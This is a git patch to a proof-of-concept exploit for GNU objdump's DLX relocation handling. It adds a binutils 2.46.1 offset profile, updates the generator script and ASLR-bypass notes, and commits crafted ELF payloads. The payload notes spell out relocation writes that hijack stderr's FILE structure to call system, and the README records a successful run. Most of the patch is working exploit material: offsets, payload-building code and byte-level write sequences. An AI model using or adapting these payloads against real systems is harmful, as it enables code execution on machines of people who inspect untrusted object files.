From 9454cb7b4892c9799b42be4d1a46afcc0e1408d3 Mon Sep 17 00:00:00 2001 From: ashton <63224111+bikini@users.noreply.github.com> Date: Thu, 25 Jun 2026 06:16:10 -0500 Subject: [PATCH] Update objdump DLX PoC for binutils 2.46.1 --- objdump-dlx-calc-poc/README.md | 24 ++++++++++++- .../docs/aslr-bypass-analysis.md | 18 ++++++++++ .../generate_objdump_dlx_calc_poc.py | 17 +++++++-- ...c_aslr_gnu2461_f05_b6f300000_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s7043e4ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s7043e4ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s7043e4ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s7043e4ff.notes | 34 ++++++++++++++++++ ...lc_aslr_orig_f05_bef210000_s7042e500.notes | 1 + ...lc_aslr_orig_f05_bef210000_s7043e4ff.notes | 1 + ...lc_aslr_orig_f05_bf020ff00_s7042e500.notes | 1 + ...lc_aslr_orig_f05_bf020ff00_s7043e4ff.notes | 1 + ...lc_aslr_orig_f06_bef210000_s7042e500.notes | 1 + ...lc_aslr_orig_f06_bef210000_s7043e4ff.notes | 1 + ...lc_aslr_orig_f06_bf020ff00_s7042e500.notes | 1 + ...lc_aslr_orig_f06_bf020ff00_s7043e4ff.notes | 1 + ...aslr_wsl2404_f05_b6f300000_s7042e500.notes | 1 + ...aslr_wsl2404_f05_b6f300000_s7043e4ff.notes | 1 + ...aslr_wsl2404_f05_b702fff00_s7042e500.notes | 1 + ...aslr_wsl2404_f05_b702fff00_s7043e4ff.notes | 1 + ...aslr_wsl2404_f06_b6f300000_s7042e500.notes | 1 + ...aslr_wsl2404_f06_b6f300000_s7043e4ff.notes | 1 + ...aslr_wsl2404_f06_b702fff00_s7042e500.notes | 1 + ...aslr_wsl2404_f06_b702fff00_s7043e4ff.notes | 1 + 35 files changed, 344 insertions(+), 3 deletions(-) create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.notes diff --git a/objdump-dlx-calc-poc/README.md b/objdump-dlx-calc-poc/README.md index 17874cc..4ba00cf 100644 --- a/objdump-dlx-calc-poc/README.md +++ b/objdump-dlx-calc-poc/README.md @@ -10,6 +10,14 @@ Tested against a binutils-gdb master build from commit: c311f4d37f31ff3fbb5db6923abcdf93bb75a37b ``` +Also validated against the official GNU Binutils 2.46.1 release tarball with a +clean `dlx-elf` objdump build: + +```text +GNU objdump (GNU Binutils) 2.46.1 +elf32-dlx +``` + ## whats in here - `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump` @@ -27,18 +35,32 @@ The payload files are named `.bin` because they are raw binary files, but the fi ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing. -The generator emits the original profile plus a WSL/Ubuntu 24.04 profile measured against the pinned `dlx-elf` build. The second profile keeps ASLR on but uses stable relative offsets observed in the target process: +The generator emits the original profile, a WSL/Ubuntu 24.04 profile measured +against the pinned `dlx-elf` build, and a profile measured against a clean GNU +Binutils 2.46.1 `dlx-elf` build. The profiles keep ASLR on but use stable +relative offsets observed in the target process: ```text layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 system_delta=0x7042e500 or 0x7043e4ff + +layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40 +buf_delta=0x702fff00 or 0x6f300000 +system_delta=0x7042e500 or 0x7043e4ff ``` That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. More detail is in `docs/aslr-bypass-analysis.md`. +The `gnu2461` profile was validated with the existing runner: + +```text +HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin +CALC_HELPER_RAN 2026-06-25T11:14:27Z +``` + So a plain crash like this does not always mean the PoC failed: ```text diff --git a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md index d3f1690..15df6a9 100644 --- a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md +++ b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md @@ -14,6 +14,8 @@ The current generator emits: - `orig`: the first measured profile. - `wsl2404`: offsets measured against the pinned `dlx-elf` build on WSL/Ubuntu 24.04. +- `gnu2461`: offsets measured against a clean GNU Binutils 2.46.1 `dlx-elf` + objdump build. The `wsl2404` profile uses: @@ -25,6 +27,22 @@ buf_delta=0x702fff00 or 0x6f300000 system_delta=0x7042e500 or 0x7043e4ff ``` +The `gnu2461` profile uses: + +```text +off_io=-0x3690 +off_sec=0xbb8 +sec_size_offset=0x40 +rbase=0x190 +buf_delta=0x702fff00 or 0x6f300000 +system_delta=0x7042e500 or 0x7043e4ff +``` + +The 2.46.1 profile differs because the relocation cache array moved from +`data+0x220` to `data+0x190`, the BFD section object moved from `data+0xbb0` +to `data+0xbb8`, and the `bfd_section.size` field used to widen generic +relocation range checks is at section offset `0x40`. + ## Why argv two-stage is not enough A deterministic leak-then-exploit route would need this sequence in one diff --git a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py index bb4e559..faf2348 100644 --- a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py +++ b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py @@ -36,6 +36,7 @@ LAYOUTS = ( "name": "orig", "off_io": OFF_IO, "off_sec": OFF_SEC, + "sec_size_offset": 0x38, "rbase": RBASE, "buf_deltas": BUF_TO_FILE_BE32_DELTAS, "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, @@ -45,11 +46,22 @@ LAYOUTS = ( "name": "wsl2404", "off_io": -0x3690, "off_sec": 0xBB0, + "sec_size_offset": 0x38, "rbase": 0x220, "buf_deltas": (0x702FFF00, 0x6F300000), "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, "system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS, }, + { + "name": "gnu2461", + "off_io": -0x3690, + "off_sec": 0xBB8, + "sec_size_offset": 0x40, + "rbase": 0x190, + "buf_deltas": (0x702FFF00, 0x6F300000), + "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, + "system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS, + }, ) @@ -85,8 +97,8 @@ def build(out_dir): file_system_slot = off_io + 0x68 file_wide_data = off_io + 0xA0 file_vtable = off_io + 0xD8 - section_size_low = off_sec + 0x38 - section_size_high = off_sec + 0x3C + section_size_low = off_sec + layout["sec_size_offset"] + section_size_high = section_size_low + 4 for flag_byte4 in (0x05, 0x06): for buf_delta in layout["buf_deltas"]: @@ -131,6 +143,7 @@ def build(out_dir): f"system_delta=0x{system_delta:08x}", "command=P", f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}", + f"sec_size_offset={layout['sec_size_offset']:#x}", "", ] + [ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..5005c15ed2b8541fe0d7671fcc87fed7ba23db9b GIT binary patch literal 1280 zcmd5*T}vB56g`_=jnP`IvC*_bA6jTZNS#eIN|csLTR}m=2f;oRrO_7DgiM4M1^l^a{=cNzto7ANjx^ASL)0=of5p3H}2f z5bdYHpx^}XQ2y=|7_!NafML;(fk&b@fDzG~Kw9)GV3hjrVc;=!rvzlEJM+Mp=u5zO zB4}MU?BJ6SdE_0z&0@a`PvSpCy9Lklh|WmB9p-VKMB~MItln?<2Ms^(jaJN`HvAdG zpEc_2SJ(N^jQVq<{<1PfrE~vD!~fdw=d16o4zTzg)fiy^h?M^7i5G=Who)736B=y)LeQ?AN!pk<;~BfM3HbyyJa9W=vM} z&gJFHOhpmpNec0KoF(TQX-8B`Q{nvMZCJS^%94HjJ`?-6WG;k FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..86172e9b10dbe38696401eeb53284edd892eeb3d GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuPGS`UVOLx97V*$;~Xpr60_k@0{;sX71#hU*DGIt%QY2SnI!;#{~PIU(5OP zS0qti@xH6Xx(DnOkNyBSDbKqp0d?ewNuXYE3P_562sDs?cmz^{Pe7yKGl$>{&_uL9 z1I>bcK#TnD0%*0#&ww`3&w+N)?|=@`?}4=F55Pz2w{1Wtb!QUjqV7xq-J*X7J|%*y z>j`hLH$-mvN^r5*|H7U4QM6m|Jdfyf1l(aB=SkcRUdHN;hQHbH^W1oj`O}8K%kcLY zb>3Ia{{2RMz^H#IjZmqcf5`9;8~*I!+~4^3Lr%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5ga+zL82qwKNs>KW4+qHBpAF FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..6e0000d69bd9996bb547d4f3bc6916d4a7988e41 GIT binary patch literal 1280 zcmd5*+e%wO6kR9hXcBGICiU8a4+<>^N$12{QK?vL1qB5k1brxmrWa^Ua3Zu=@E80E zpQQiL$F^S}m{-9+s1V_F?Q_e?JQN?@FlX(x_Ht(2*>keG@!CpRh{M`FW1bM~Yri(_ zf1e?Z?$~>;66+GMv%Go}aI&8Fy9RWTrxt*2!9^e~dL77+_x=U4f;T{qV2exe7I;9k z9|JkTCqSS4-6_y-lOF>EqJIY-ihcp)MZW|JqBns@)c*_sgVdb`V2HZ22n>t928^VF z){TZ891D?0{wKIu;&m|8veE%uKUo!mV`pQ+(KWF&a?~e0dZu;BD`@b^$Zw&uBx%4&a z=O%NBh;Iip<~to+KZjP(E_4}s8hQqL7J3eP9{L4KQf6Jzpy*JvD0&o4iY`T)qR*wz zm3`=Q>2vx1ijC^m28!>hm7@=DKOMZUp?FyR+`;v?FOB^Qin?(a;Kwiv?|2uG8Iu*g zb9wnPQ&B{DnnH3O=gIj-;)rSmDx7~Thm~JMS+bAcXJUp+=0bQF7WcA#l5}x#)P29q e=2XZD68089dwv>xqI1hqZ0q(p^QATq?*0#}!G9b8 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes new file mode 100644 index 0000000..8fadcf1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7042e500 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d85b8578430757f06f24aee225ef20aa359d89f8 GIT binary patch literal 1280 zcmd5*%Su~O6kRv>#uy*Ia4xcjka$#+`ZKnZ(}! zBdMTu`LKhdA@az-7>gzT7oNnAqTGV#c|>P0;12yH&!9PWnaFn;`d&lNd*d#l&l&n* zL!USD>{r|QFOB>wBR^i7lIzCzpEUGShQ3%^{+;~3vY}_c+s7)JqV%lB7kRKGP)*sgAU-QC##vU7w&y?W5b_3>e2a|;FCs0X+gdf^@a1!Tr# zMekf*zRXl)k)L58Igb@`zLD6XT#gaWKbFGGPogZTQIYG>R&+W7C23vG)QId~w`-1+$BMfB8vp FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..5005c15ed2b8541fe0d7671fcc87fed7ba23db9b GIT binary patch literal 1280 zcmd5*T}vB56g`_=jnP`IvC*_bA6jTZNS#eIN|csLTR}m=2f;oRrO_7DgiM4M1^l^a{=cNzto7ANjx^ASL)0=of5p3H}2f z5bdYHpx^}XQ2y=|7_!NafML;(fk&b@fDzG~Kw9)GV3hjrVc;=!rvzlEJM+Mp=u5zO zB4}MU?BJ6SdE_0z&0@a`PvSpCy9Lklh|WmB9p-VKMB~MItln?<2Ms^(jaJN`HvAdG zpEc_2SJ(N^jQVq<{<1PfrE~vD!~fdw=d16o4zTzg)fiy^h?M^7i5G=Who)736B=y)LeQ?AN!pk<;~BfM3HbyyJa9W=vM} z&gJFHOhpmpNec0KoF(TQX-8B`Q{nvMZCJS^%94HjJ`?-6WG;k FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..86172e9b10dbe38696401eeb53284edd892eeb3d GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuPGS`UVOLx97V*$;~Xpr60_k@0{;sX71#hU*DGIt%QY2SnI!;#{~PIU(5OP zS0qti@xH6Xx(DnOkNyBSDbKqp0d?ewNuXYE3P_562sDs?cmz^{Pe7yKGl$>{&_uL9 z1I>bcK#TnD0%*0#&ww`3&w+N)?|=@`?}4=F55Pz2w{1Wtb!QUjqV7xq-J*X7J|%*y z>j`hLH$-mvN^r5*|H7U4QM6m|Jdfyf1l(aB=SkcRUdHN;hQHbH^W1oj`O}8K%kcLY zb>3Ia{{2RMz^H#IjZmqcf5`9;8~*I!+~4^3Lr%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5ga+zL82qwKNs>KW4+qHBpAF FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..6e0000d69bd9996bb547d4f3bc6916d4a7988e41 GIT binary patch literal 1280 zcmd5*+e%wO6kR9hXcBGICiU8a4+<>^N$12{QK?vL1qB5k1brxmrWa^Ua3Zu=@E80E zpQQiL$F^S}m{-9+s1V_F?Q_e?JQN?@FlX(x_Ht(2*>keG@!CpRh{M`FW1bM~Yri(_ zf1e?Z?$~>;66+GMv%Go}aI&8Fy9RWTrxt*2!9^e~dL77+_x=U4f;T{qV2exe7I;9k z9|JkTCqSS4-6_y-lOF>EqJIY-ihcp)MZW|JqBns@)c*_sgVdb`V2HZ22n>t928^VF z){TZ891D?0{wKIu;&m|8veE%uKUo!mV`pQ+(KWF&a?~e0dZu;BD`@b^$Zw&uBx%4&a z=O%NBh;Iip<~to+KZjP(E_4}s8hQqL7J3eP9{L4KQf6Jzpy*JvD0&o4iY`T)qR*wz zm3`=Q>2vx1ijC^m28!>hm7@=DKOMZUp?FyR+`;v?FOB^Qin?(a;Kwiv?|2uG8Iu*g zb9wnPQ&B{DnnH3O=gIj-;)rSmDx7~Thm~JMS+bAcXJUp+=0bQF7WcA#l5}x#)P29q e=2XZD68089dwv>xqI1hqZ0q(p^QATq?*0#}!G9b8 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes new file mode 100644 index 0000000..16e95a3 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7042e500 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d85b8578430757f06f24aee225ef20aa359d89f8 GIT binary patch literal 1280 zcmd5*%Su~O6kRv>#uy*Ia4xcjka$#+`ZKnZ(}! zBdMTu`LKhdA@az-7>gzT7oNnAqTGV#c|>P0;12yH&!9PWnaFn;`d&lNd*d#l&l&n* zL!USD>{r|QFOB>wBR^i7lIzCzpEUGShQ3%^{+;~3vY}_c+s7)JqV%lB7kRKGP)*sgAU-QC##vU7w&y?W5b_3>e2a|;FCs0X+gdf^@a1!Tr# zMekf*zRXl)k)L58Igb@`zLD6XT#gaWKbFGGPogZTQIYG>R&+W7C23vG)QId~w`-1+$BMfB8vp FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 